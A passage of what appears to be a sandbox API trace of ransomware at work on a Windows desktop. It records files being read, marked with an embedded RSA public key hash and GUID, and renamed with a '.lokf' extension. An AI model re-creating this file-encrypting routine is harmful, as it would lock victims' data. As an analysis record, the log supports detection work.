(pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4UyQPASLT.wav") returned=".wav" [0058.436] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4UyQPASLT.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4uyqpaslt.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.436] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=38516) returned 1 [0058.436] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.439] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x964e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.439] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.439] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.439] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x9674, lpOverlapped=0x0) returned 1 [0058.440] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.440] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.440] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.440] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.440] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0058.440] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.440] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.440] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.440] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.441] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.441] GetLastError () returned 0x0 [0058.441] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.441] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0058.441] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.441] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.441] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.441] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.441] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x3292fe8, Size=0x218) returned 0x32947b0 [0058.441] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32949d0 [0058.441] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x9674, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.441] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.442] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.442] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.442] CloseHandle (hObject=0x5cc) returned 1 [0058.442] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269478 [0058.442] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x880) returned 0x3268798 [0058.442] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4UyQPASLT.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4uyqpaslt.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4UyQPASLT.wav.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4uyqpaslt.wav.lokf")) returned 1 [0058.444] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fa827e0, ftCreationTime.dwHighDateTime=0x1d4cff8, ftLastAccessTime.dwLowDateTime=0xb151e5d0, ftLastAccessTime.dwHighDateTime=0x1d4c55a, ftLastWriteTime.dwLowDateTime=0xb151e5d0, ftLastWriteTime.dwHighDateTime=0x1d4c55a, nFileSizeHigh=0x0, nFileSizeLow=0xbd8e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5VDyYw1.m4a", cAlternateFileName="")) returned 1 [0058.444] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0058.444] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76) returned 0x3289860 [0058.444] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5VDyYw1.m4a") returned=".m4a" [0058.444] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5VDyYw1.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5vdyyw1.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.444] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=48526) returned 1 [0058.444] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.446] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xbd68, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.446] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.447] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.447] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xbd8e, lpOverlapped=0x0) returned 1 [0058.447] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.447] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.447] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.448] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.448] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0058.448] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.448] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.448] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.448] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.448] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.448] GetLastError () returned 0x0 [0058.448] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.448] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0058.449] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.449] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.449] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.449] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.449] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x3292fe8, Size=0x218) returned 0x32947b0 [0058.449] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32949d0 [0058.449] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xbd8e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.449] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.449] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.449] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.449] CloseHandle (hObject=0x5cc) returned 1 [0058.450] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269478 [0058.450] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x870) returned 0x3268798 [0058.450] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5VDyYw1.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5vdyyw1.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5VDyYw1.m4a.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5vdyyw1.m4a.lokf")) returned 1 [0058.452] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb751d30, ftCreationTime.dwHighDateTime=0x1d4cb22, ftLastAccessTime.dwLowDateTime=0x93643bf0, ftLastAccessTime.dwHighDateTime=0x1d4d36e, ftLastWriteTime.dwLowDateTime=0x93643bf0, ftLastWriteTime.dwHighDateTime=0x1d4d36e, nFileSizeHigh=0x0, nFileSizeLow=0x10cf1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="60uV9dxrIvRWJYpX2.pps", cAlternateFileName="60UV9D~1.PPS")) returned 1 [0058.452] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0058.452] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8a50 [0058.452] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\60uV9dxrIvRWJYpX2.pps") returned=".pps" [0058.452] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\60uV9dxrIvRWJYpX2.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\60uv9dxrivrwjypx2.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.452] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=68849) returned 1 [0058.452] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.454] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x10ccb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.454] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.455] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.455] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x10cf1, lpOverlapped=0x0) returned 1 [0058.455] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.455] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.455] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.455] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.455] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b89c8) returned 1 [0058.456] CryptCreateHash (in: hProv=0x6b89c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.456] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.456] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.456] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.456] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.456] GetLastError () returned 0x0 [0058.456] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.456] CryptReleaseContext (hProv=0x6b89c8, dwFlags=0x0) returned 1 [0058.456] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.456] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.456] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.457] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.457] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x3292fe8, Size=0x218) returned 0x32947b0 [0058.457] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32949d0 [0058.457] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x10cf1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.457] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.457] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.457] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.457] CloseHandle (hObject=0x5cc) returned 1 [0058.458] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0058.458] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x890) returned 0x3268798 [0058.458] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\60uV9dxrIvRWJYpX2.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\60uv9dxrivrwjypx2.pps"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\60uV9dxrIvRWJYpX2.pps.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\60uv9dxrivrwjypx2.pps.lokf")) returned 1 [0058.460] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b852ad0, ftCreationTime.dwHighDateTime=0x1d4c65d, ftLastAccessTime.dwLowDateTime=0xac0c5a10, ftLastAccessTime.dwHighDateTime=0x1d4c5ff, ftLastWriteTime.dwLowDateTime=0xac0c5a10, ftLastWriteTime.dwHighDateTime=0x1d4c5ff, nFileSizeHigh=0x0, nFileSizeLow=0xa444, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6NumCnon.pps", cAlternateFileName="")) returned 1 [0058.460] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0058.460] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76) returned 0x3289860 [0058.460] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6NumCnon.pps") returned=".pps" [0058.460] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6NumCnon.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6numcnon.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.460] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=42052) returned 1 [0058.460] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.462] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xa41e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.462] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.463] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.463] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xa444, lpOverlapped=0x0) returned 1 [0058.463] lstrlenA (lpString="-----BEGIN PUBLIC 